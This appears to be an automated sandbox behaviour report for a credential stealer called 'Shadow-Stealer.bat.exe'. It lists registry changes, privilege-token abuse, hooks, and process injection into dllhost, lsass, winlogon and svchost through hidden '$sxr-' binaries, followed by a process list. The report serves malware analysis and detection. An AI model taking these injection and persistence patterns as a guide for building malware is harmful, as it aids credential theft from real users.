Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259} C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668} C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f80cb859f6720028040b29b5540cc05aab60000 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff C:\Windows\Explorer.EXE N/A
Key created \Registry\User\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\NotificationData C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff C:\Windows\Explorer.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4272 wrote to memory of 5052 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
PID 4272 wrote to memory of 5052 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
PID 5052 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5052 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4916 wrote to memory of 752 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 4916 wrote to memory of 752 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 752 wrote to memory of 3376 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 752 wrote to memory of 3376 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 3376 wrote to memory of 3288 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 3288 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 3288 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 3288 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 3288 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 3288 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 3288 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 wrote to memory of 4716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 3376 wrote to memory of 4716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 wrote to memory of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4656 wrote to memory of 608 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 4656 wrote to memory of 696 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 4656 wrote to memory of 980 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4656 wrote to memory of 428 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 4656 wrote to memory of 456 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4656 wrote to memory of 976 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4656 wrote to memory of 1056 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4656 wrote to memory of 1068 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4656 wrote to memory of 1160 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4656 wrote to memory of 1184 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4656 wrote to memory of 1272 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4656 wrote to memory of 1304 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4656 wrote to memory of 1356 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4656 wrote to memory of 1456 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4656 wrote to memory of 1504 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

